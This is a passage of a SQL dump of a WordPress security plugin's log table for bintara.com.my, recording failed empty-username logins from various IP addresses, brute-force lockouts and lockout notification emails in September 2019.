P_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX9mViJ7D9Gn7wDPh8TVwAAAM4\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"198.72.112.193\";s:11:\"REMOTE_PORT\";s:5:\"52188\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX9mViJ7D9Gn7wDPh8TVwAAAM4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062298.0243\";s:12:\"REQUEST_TIME\";s:10:\"1569062298\";}}','notice','2019-09-21 10:38:19','2019-09-21 10:38:18',17796400,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'198.72.112.193'),(25243,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:36:54','2019-09-21 10:36:53',18088784,19289624,'https://bintara.com.my/wordpress/wp-login.php',1,0,'104.238.73.216'),(25244,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX9YWYqJrDl1gYLQWcXowAAAA0\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"93.114.86.226\";s:11:\"REMOTE_PORT\";s:5:\"43952\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX9YWYqJrDl1gYLQWcXowAAAA0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062241.2029\";s:12:\"REQUEST_TIME\";s:10:\"1569062241\";}}','notice','2019-09-21 10:37:22','2019-09-21 10:37:21',17798976,19289312,'https://bintara.com.my/test/wp-login.php',1,0,'93.114.86.226'),(25242,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:36:53\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:36:53\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:51:53\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:51:53\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:36:54','2019-09-21 10:36:53',17883096,19289624,'https://bintara.com.my/wordpress/wp-login.php',1,0,'104.238.73.216'),(25239,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:36:36\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:36:36\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:51:36\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:51:36\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:36:37','2019-09-21 10:36:36',17884328,19289672,'https://bintara.com.my/blog/wp-login.php',1,0,'192.95.30.27'),(25240,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:36:37','2019-09-21 10:36:36',18090392,19289672,'https://bintara.com.my/blog/wp-login.php',1,0,'192.95.30.27'),(25241,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX9RGYqJrDl1gYLQWcXmQAAAA0\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"104.238.73.216\";s:11:\"REMOTE_PORT\";s:5:\"49322\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX9RGYqJrDl1gYLQWcXmQAAAA0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062212.8776\";s:12:\"REQUEST_TIME\";s:10:\"1569062212\";}}','notice','2019-09-21 10:36:54','2019-09-21 10:36:53',17798200,19289624,'https://bintara.com.my/wordpress/wp-login.php',1,0,'104.238.73.216'),(25236,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:36:28\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:36:28\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:51:28\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:51:28\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:36:29','2019-09-21 10:36:28',17884272,19289448,'https://bintara.com.my/2019/wp-login.php',1,0,'132.148.157.66'),(25237,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:36:29','2019-09-21 10:36:28',18089880,19289448,'https://bintara.com.my/2019/wp-login.php',1,0,'132.148.157.66'),(25238,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX9M2YqJrDl1gYLQWcXkAAAAAE\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"192.95.30.27\";s:11:\"REMOTE_PORT\";s:5:\"41632\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX9M2YqJrDl1gYLQWcXkAAAAAE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062195.8181\";s:12:\"REQUEST_TIME\";s:10:\"1569062195\";}}','notice','2019-09-21 10:36:37','2019-09-21 10:36:36',17799256,19289672,'https://bintara.com.my/blog/wp-login.php',1,0,'192.95.30.27'),(25235,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX9K2YqJrDl1gYLQWcXjAAAABY\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"132.148.157.66\";s:11:\"REMOTE_PORT\";s:5:\"57576\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX9K2YqJrDl1gYLQWcXjAAAABY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062188.0962\";s:12:\"REQUEST_TIME\";s:10:\"1569062188\";}}','notice','2019-09-21 10:36:29','2019-09-21 10:36:28',17799336,19289448,'https://bintara.com.my/2019/wp-login.php',1,0,'132.148.157.66'),(25233,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:35:51\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:35:51\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:50:51\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:50:51\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:35:52','2019-09-21 10:35:51',17882808,19288360,'https://bintara.com.my/wordpress/wp-login.php',1,0,'212.91.156.52'),(25234,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:35:52','2019-09-21 10:35:51',18088488,19288360,'https://bintara.com.my/wordpress/wp-login.php',1,0,'212.91.156.52'),(25232,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX9BrfBTP0kPOVnb8jouQAAAFY\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"212.91.156.52\";s:11:\"REMOTE_PORT\";s:5:\"34514\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX9BrfBTP0kPOVnb8jouQAAAFY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062150.6817\";s:12:\"REQUEST_TIME\";s:10:\"1569062150\";}}','notice','2019-09-21 10:35:52','2019-09-21 10:35:51',17798064,19288360,'https://bintara.com.my/wordpress/wp-login.php',1,0,'212.91.156.52'),(25230,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:35:05\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:35:05\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:50:05\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:50:05\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:35:06','2019-09-21 10:35:05',17884072,19289808,'https://bintara.com.my/test/wp-login.php',1,0,'138.197.146.132'),(25231,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:35:06','2019-09-21 10:35:05',18090184,19289808,'https://bintara.com.my/test/wp-login.php',1,0,'138.197.146.132'),(25227,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:34:36\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:34:36\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:49:36\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:49:36\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:34:37','2019-09-21 10:34:36',17884208,19289448,'https://bintara.com.my/2019/wp-login.php',1,0,'47.106.247.125'),(25228,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:34:37','2019-09-21 